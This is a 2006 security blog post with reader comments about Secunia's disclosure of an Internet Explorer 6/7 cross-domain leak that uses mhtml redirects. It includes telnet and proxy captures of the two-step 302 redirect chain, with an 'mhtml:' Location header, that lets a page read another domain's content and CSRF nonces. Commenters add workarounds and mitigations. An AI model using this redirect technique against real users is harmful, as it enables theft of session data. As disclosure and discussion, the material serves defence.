IE6.0 and IE7.0 Vulnerable to Complete Cross Domain Leakage
This is some of the worst ownage I’ve seen in a long time. Secunia announced a really nasty cross domain leak for Internet Explorer. This allows anyone with control over a webserver to control anything you do with any page you can connect to. It’s interesting that Secunia marked it as a “less critical” threat, as this pretty much gives any attacker read access to any domain anywhere as long as you are using Internet Explorer 6.0 or 7.0.
The only saving grace here is that it does require access to a server where you can write HTTP headers (or somewhere that you can do header injection/redirection) as you need to force the browser to go to a certain URL which then redirects to another URL. Here’s what the header’s look like:
telnet secunia.com 80
Trying 213.150.41.226…
Connected to secunia.com.
Escape character is ‘^]’.
GET /ie_redir_test_1/1234 HTTP/1.0HTTP/1.1 302 Found
Date: Thu, 19 Oct 2006 15:38:46 GMT
Server: Apache
Location: mhtml:http://secunia.com/ie_redir_test_2
Connection: close
Content-Type: text/html
telnet secunia.com 80
Trying 213.150.41.226…
Connected to secunia.com.
Escape character is ‘^]’.
GET /ie_redir_test_2 HTTP/1.0HTTP/1.1 302 Found
Date: Thu, 19 Oct 2006 15:39:00 GMT
Server: Apache
Location: http://news.google.com/
Connection: close
Content-Type: text/html
At this point the client is redirected to the server as you (with your credentials) and it is returned as a cachable mhtml file that can be read via XMLHttpRequest since it “appears” to your browser to be located on the machine that did the redirection. Pretty clever. I’ve played around with these sorts of things before but was never successful (obviously I never tried mhtml). It seems to me that someone was saving this one.
And remember our nonces we were using to protect against CSRF? Well forget it, they’re readable by the cross domain leakage now. I don’t know why anyone would say this is a less critical risk as this is complete ownage of the entire internet for users of Internet Explorer. Hopefully Microsoft will patch this one quickly.
October 19th, 2006 at 8:53 am
[…] Internet Explorer 6 days are a thing of the past. Microsoft announced the final release of Internet Explorer 7 for Windows XP yesterday. I’ve used IE7 since private beta days and I must say, Microsoft has done a smashup job with IE7. Please, please, please… if you’re an Internet Explorer user, go graduate to the next level of safety and security. Update: Looks like IE7 is vulnerable to some pretty amazing XSS trickery. Hat tip, Rsnake. […]
October 19th, 2006 at 10:15 am
and almost 3 weeks till the next patch tuesday..
October 19th, 2006 at 10:23 am
[…] Added: Saw this post on ha.ckers.org that says it allows anyone with control over a webserver to control anything you do with any page you can connect to. This is some of the worst ownage I’ve seen in a long time. Secunia announced a really nasty cross domain leak for Internet Explorer. This allows anyone with control over a webserver to control anything you do with any page you can connect to. It’s interesting that Secunia marked it as a “less critical” threat, as this pretty much gives any attacker read access to any domain anywhere as long as you are using Internet Explorer 6.0 or 7.0. […]
October 19th, 2006 at 10:24 am
IE6.0 and IE7.0 Vulnerable to Complete Cross Domain Leakage…
This is some of the worst ownage Ive seen in a long time. Secunia announced a really nasty cross domain leak for Internet Explorer. This allows anyone with control over a webserver to control anything you do with any page you can connect to. Its intere…
October 19th, 2006 at 11:55 am
lol… great release… so IE7 will be subject to most of the next patch days
October 19th, 2006 at 12:22 pm
The secunia exploit didn’t work on my IE7 running on Vista with default settings
October 19th, 2006 at 12:36 pm
[…] Upgrading to IE 7 might be a bad idea as at least one person has completely fragged his computer with it (more a Windows Update problem than an IE 7 problem). Oh yeah, and the first IE 7 security vulnerability has already been found (translated to english here, comments here). […]
October 19th, 2006 at 1:28 pm
Worked for my IE6 and IE7 on xp sp2.
And, it looks like this was found back in april.. and never patched..
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2111
http://www.osvdb.org/25073
i guess that giant is only pretending to be asleep
October 20th, 2006 at 3:50 am
IE7 releases with vulnerability (and fun with res…
Open IT Blogwatch in a new tab and read how Microsoft released Internet Explorer 7, but all is not well. Not to mention how to reply to lame resume writers……
October 20th, 2006 at 4:49 am
I managed to do the same attack on my server, news.google.com and many other domains worked, but on some websites it didn’t work. Anyway I would say this is a really serious flaw, it’s something websites cannot protect against.
October 20th, 2006 at 8:35 am
Do you know which sites weren’t vulnerable (a list of 2 or 3 would help)? Perhaps in that knowledge we might be able to figure out how to stop it on the server side.
October 20th, 2006 at 9:35 am
Hrm, i would think it would be able to pull in any site. Just looking at the requests intercepted by burp proxy.. you can see the final google request is nothing out of the ordinary:
GET /ie_redir_test_1/?0.6203240305274063 HTTP/1.0
Accept: */*
Accept-Language: en-us
Referer: http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: secunia.com
Cookie: cookies here (spammy)
GET /ie_redir_test_2 HTTP/1.0
Accept: */*
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: secunia.com
Cookie: cookies here
GET / HTTP/1.0
Accept: */*
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Cookie: cookies here
Host: news.google.com
Unless of course, the mhtml chokes on certain characters in the URL.. which would be unusual.
October 20th, 2006 at 9:38 am
I read today that this is actually not a problem in IE but a problem in Outlook Express (some sort of hook into the browser that manifests itself in the browser). Perhaps that has something to do with it? Maybe it’s not super stable as a result.
October 20th, 2006 at 11:42 am
you’re right.. completely uninstalling Outlook Express (which is not easy) prevents this from working. Steps to install from XP: http://www.activewin.com/tips/tips/microsoft/winxp/advanced/8.shtml
But.. while in IE7, it caused it to just not work, in IE6 it causes explorer to crash everytime. Even when thunderbird is set as my default email client. Possibly from ‘Address Book’ still being set as the default - unable to change without a replacement program.
October 20th, 2006 at 12:07 pm
from process of elimination, its the msoert2.dll. If you use IE7, rename that to msoert2.old and it may be a workaround. others who try it let me know if that works for you too. but that still crashes ie6 :/
October 22nd, 2006 at 9:18 am
[…] I know there are quite a few people who read this site but don’t look at the forums, so to save you some time in combing through all the recent posts, I thought I’d highlight a few that were very noteworthy. The first is from Łukasz Pilorz. After doing quite a few tests against the most recent mhtml vulnerability in IE (which turned out to be a problem with interaction between outlook express and the browser) Łukasz found that there is one server side mitigating factor that makes this attack fail - and it’s something as simple as adding a few linebreaks to your code. […]
October 23rd, 2006 at 6:44 am
[…] A blogger at ha.ckers.org contends this bug represents a major security risk (read on for a hard-wired snapshot of the “complete cross-domain leakage” threat) and criticizes Secunia for tagging the threat as merely a 2 on a scale of 1-5. […]